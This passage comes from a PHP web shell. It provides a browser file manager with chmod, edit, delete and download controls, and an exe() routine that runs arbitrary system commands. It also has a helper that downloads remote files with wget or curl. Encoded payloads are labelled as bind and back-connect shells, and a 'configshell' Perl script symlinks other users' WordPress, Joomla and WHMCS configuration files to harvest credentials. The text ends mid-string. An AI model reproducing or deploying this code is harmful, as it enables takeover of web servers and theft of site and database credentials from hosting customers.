                $buff .= "<tr><td><a href=\"?y=" . $parent . "\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'>   {$folder}</a></td><td>LINK</td>\r\n\t\t\t<td style=\"text-align:center;\">" . $owner . "</td>\r\n\t\t\t<td><center>" . get_perms($parent) . "</center></td><td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($parent)) . "</td>\r\n\t\t\t<td><span id=\"titik2\"><a href=\"?y={$pwd}&amp;edit=" . $parent . "newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>\r\n\t\t\t<form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">\r\n\t\t\t<input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" />\r\n\t\t\t<input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />\r\n\t\t\t<input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />\r\n\t\t\t</form>\r\n\t\t\t</td></tr>";
            } else {
                if (!$win && $posix) {
                    $name = @posix_getpwuid(@fileowner($folder));
                    $group = @posix_getgrgid(@filegroup($folder));
                    $owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
                } else {
                    $owner = $user;
                }
                $buff .= "<tr><td><a id=\"" . clearspace($folder) . "_link\" href=\"?y=" . $pwd . $folder . DIRECTORY_SEPARATOR . "\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' />     [ {$folder} ]</b></a>\r\n\t\t\t<form action=\"?y={$pwd}\" method=\"post\" id=\"" . clearspace($folder) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">\r\n\t\t\t<input type=\"hidden\" name=\"oldname\" value=\"" . $folder . "\" style=\"margin:0;padding:0;\" />\r\n\t\t\t<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"" . $folder . "\" />\r\n\t\t\t<input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />\r\n\t\t\t<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($folder) . "_form','" . clearspace($folder) . "_link');\" />\r\n\t\t\t</form><td>DIR</td><td style=\"text-align:center;\">" . $owner . "</td>\r\n\t\t\t<td><center>\r\n\t\t\t<a href=\"javascript:tukar('" . clearspace($folder) . "_link','" . clearspace($folder) . "_form3');\">" . get_perms($pwd . $folder) . "</a>\r\n\t\t\t<form action=\"?y={$pwd}\" method=\"post\" id=\"" . clearspace($folder) . "_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> \r\n\t\t\t<input type=\"hidden\" name=\"name\" value=\"" . $folder . "\" style=\"margin:0;padding:0;\" /> \r\n\t\t\t<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"" . substr(sprintf('%o', fileperms($pwd . $folder)), -4) . "\" /> \r\n\t\t\t<input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" /> \r\n\t\t\t<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" \r\n\t\t\tonclick=\"tukar('" . clearspace($folder) . "_link','" . clearspace($folder) . "_form3');\" /></form></center></td>\r\n\t\t\t<td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($folder)) . "</td><td><a href=\"javascript:tukar('" . clearspace($folder) . "_link','" . clearspace($folder) . "_form');\">rename</a> | <a href=\"?y={$pwd}&amp;fdelete=" . $pwd . $folder . "\">delete</a></td></tr>";
            }
        }
        foreach ($fname as $file) {
            $full = $pwd . $file;
            if (!$win && $posix) {
                $name = @posix_getpwuid(@fileowner($folder));
                $group = @posix_getgrgid(@filegroup($folder));
                $owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
            } else {
                $owner = $user;
            }
            $buff .= "<tr><td><a id=\"" . clearspace($file) . "_link\" href=\"?y={$pwd}&amp;view={$full}\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' />   {$file}</b></a>\r\n\t\t<form action=\"?y={$pwd}\" method=\"post\" id=\"" . clearspace($file) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">\r\n\t\t<input type=\"hidden\" name=\"oldname\" value=\"" . $file . "\" style=\"margin:0;padding:0;\" />\r\n\t\t<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"" . $file . "\" />\r\n\t\t<input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />\r\n\t\t<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($file) . "_link','" . clearspace($file) . "_form');\" />\r\n\t\t</form></td><td>" . ukuran($full) . "</td><td style=\"text-align:center;\">" . $owner . "</td><td><center>\r\n\t\t<a href=\"javascript:tukar('" . clearspace($file) . "_link','" . clearspace($file) . "_form2');\">" . get_perms($full) . "</a>\r\n\t\t<form action=\"?y={$pwd}\" method=\"post\" id=\"" . clearspace($file) . "_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> \r\n<input type=\"hidden\" name=\"name\" value=\"" . $file . "\" style=\"margin:0;padding:0;\" /> \r\n<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"" . substr(sprintf('%o', fileperms($full)), -4) . "\" /> \r\n<input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" /> \r\n<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($file) . "_link','" . clearspace($file) . "_form2');\" /></form></center></td>\r\n\t\t<td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($full)) . "</td>\r\n\t\t<td><a href=\"?y={$pwd}&amp;edit={$full}\">edit</a> | <a href=\"javascript:tukar('" . clearspace($file) . "_link','" . clearspace($file) . "_form');\">rename</a> | <a href=\"?y={$pwd}&amp;delete={$full}\">delete</a> | <a href=\"?y={$pwd}&amp;dl={$full}\">download</a>&nbsp;(<a href=\"?y={$pwd}&amp;dlgzip={$full}\">gzip</a>)</td></tr>";
        }
        $buff .= "</table>";
        return $buff;
    }
    function ukuran($file)
    {
        if ($size = @filesize($file)) {
            if ($size <= 1024) {
                return $size;
            } else {
                if ($size <= 1048576) {
                    $size = @round($size / 1024, 2);
                    return "{$size} kb";
                } else {
                    $size = @round($size / 1024 / 1024, 2);
                    return "{$size} mb";
                }
            }
        } else {
            return "???";
        }
    }
    function exe($cmd)
    {
        if (function_exists('system')) {
            @ob_start();
            @system($cmd);
            $buff = @ob_get_contents();
            @ob_end_clean();
            return $buff;
        } elseif (function_exists('exec')) {
            @exec($cmd, $results);
            $buff = "";
            foreach ($results as $result) {
                $buff .= $result;
            }
            return $buff;
        } elseif (function_exists('passthru')) {
            @ob_start();
            @passthru($cmd);
            $buff = @ob_get_contents();
            @ob_end_clean();
            return $buff;
        } elseif (function_exists('shell_exec')) {
            $buff = @shell_exec($cmd);
            return $buff;
        }
    }
    function tulis($file, $text)
    {
        $textz = gzinflate(base64_decode($text));
        if ($filez = @fopen($file, "w")) {
            @fputs($filez, $textz);
            @fclose($file);
        }
    }
    function ambil($link, $file)
    {
        if ($fp = @fopen($link, "r")) {
            while (!feof($fp)) {
                $cont .= @fread($fp, 1024);
            }
            @fclose($fp);
            $fp2 = @fopen($file, "w");
            @fwrite($fp2, $cont);
            @fclose($fp2);
        }
    }
    function which($pr)
    {
        $path = exe("which {$pr}");
        if (!empty($path)) {
            return trim($path);
        } else {
            return trim($pr);
        }
    }
    function download($cmd, $url)
    {
        $namafile = basename($url);
        switch ($cmd) {
            case 'wwget':
                exe(which('wget') . " " . $url . " -O " . $namafile);
                break;
            case 'wlynx':
                exe(which('lynx') . " -source " . $url . " > " . $namafile);
                break;
            case 'wfread':
                ambil($wurl, $namafile);
                break;
            case 'wfetch':
                exe(which('fetch') . " -o " . $namafile . " -p " . $url);
                break;
            case 'wlinks':
                exe(which('links') . " -source " . $url . " > " . $namafile);
                break;
            case 'wget':
                exe(which('GET') . " " . $url . " > " . $namafile);
                break;
            case 'wcurl':
                exe(which('curl') . " " . $url . " -o " . $namafile);
                break;
            default:
                break;
        }
        return $namafile;
    }
    function get_perms($file)
    {
        if ($mode = @fileperms($file)) {
            $perms = '';
            $perms .= $mode & 0400 ? 'r' : '-';
            $perms .= $mode & 0200 ? 'w' : '-';
            $perms .= $mode & 0100 ? 'x' : '-';
            $perms .= $mode & 040 ? 'r' : '-';
            $perms .= $mode & 020 ? 'w' : '-';
            $perms .= $mode & 010 ? 'x' : '-';
            $perms .= $mode & 04 ? 'r' : '-';
            $perms .= $mode & 02 ? 'w' : '-';
            $perms .= $mode & 01 ? 'x' : '-';
            return $perms;
        } else {
            return "??????????";
        }
    }
    function clearspace($text)
    {
        return str_replace(" ", "_", $text);
    }
    // net tools
    $port_bind_bd_c = "bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf\r\n+fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE\r\nP/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ\r\ndKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL\r\n3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug\r\nUq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk\r\nHDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W\r\ntyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL\r\nZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6\r\nuPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
    $port_bind_bd_pl = "ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1\r\nNmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg\r\ntNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD\r\ne/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0\r\nLSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo\r\nvaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB\r\n+hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
    $back_connect = "fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St\r\nktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j\r\nS2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ\r\nja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw\r\nTskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
    $back_connect_c = "XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA\r\nBYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95\r\nzzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75\r\ni+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A\r\nRkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY\r\njwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F\r\n6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
    //confshell
    $configshell = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCg0KPGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbi11cyIgLz4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KPHRpdGxlPlByaXY4IFNDUjwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IHRhaG9tYSwgdmVyZGFuYSwgQXJpYWw7DQogZm9udC1zaXplOiBtZWRpdW07DQogY29sb3I6ICNGRkZGRkY7DQogYmFja2dyb3VuZC1jb2xvcjogIzY2NjY2NjsNCiB0ZXh0LWFsaWduOiBjZW50ZXI7DQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KJzsNCnN1YiBsaWx7DQogICAgKCR1c2VyKSA9IEBfOw0KJG1zciA9IHF4e3B3ZH07DQoka29sYT0kbXNyLiIvIi4kdXNlcjsNCiRrb2xhPX5zL1xuLy9nOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob21lL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYSAtIGhvbWUudHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcy50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9nL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd29yZHByZXNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dlYi93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcyAtIHdlYi50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9TU0kucGhwJywka29sYS4nLSBDIE0gRiAudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vU1NJLnBocCcsJGtvbGEuJy0gQyBNIEYgLSBmb3J1bS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmMvY29uZmlnLnBocCcsJGtvbGEuJy0gTXlCQi50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luYy9jb25maWcucGhwJywka29sYS4nLSBNeUJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nLSBPdGhlci50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2xpYi9jb25maWcucGhwJywka29sYS4nLSBCYWxpdGJhbmcudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWNsaWVudHMudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnQudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmlsbGluZy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1iaWxsaW5nLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWJpbGxpbmdzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jcyAtIHdobWNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gd2htIC0gd2htLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLSBWQnVsbGV0aW4gLSBmb3J1bS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vY29uZmlnLnBocCcsJGtvbGEuJwktIFBocEJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jIC0gd2htYy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VibWl0dGlja2V0LnBocCcsJGtvbGEuJwktIHdobWNzMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFuYWdlL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1tYW5nZXdobWNzLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1teXNob3AudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnQudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnRzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnRzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vc2NvbW1lcmNlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictb3Njb21tZXJjZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1vc2NvbW1lcmNlcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2hvcHBpbmcvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2FsZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd3AudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd3dvcmRwcmVzcyAtIHdwIC0gYmV0YS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmV0YS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBiZXRhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtcHJlc3MudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLXdvcmRwcmVzcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd29yZHByZXNzL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd29yZHByZXNzLWJldGEudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL25ld3Mvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC1uZXdzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXcvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbmV3LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9ncy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBibG9ncy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9tZS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBob21lLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcm90YWwvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gcHJvdGFsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zaXRlL3dwLWNvbmZpZy5waHAnLCRrb2xhLictIHdvcmRwcmVzcyAtIHNpdGUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21haW4vd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdGVzdC93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSB0ZXN0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9qb29tbGEvY29uZmlndXJhdGl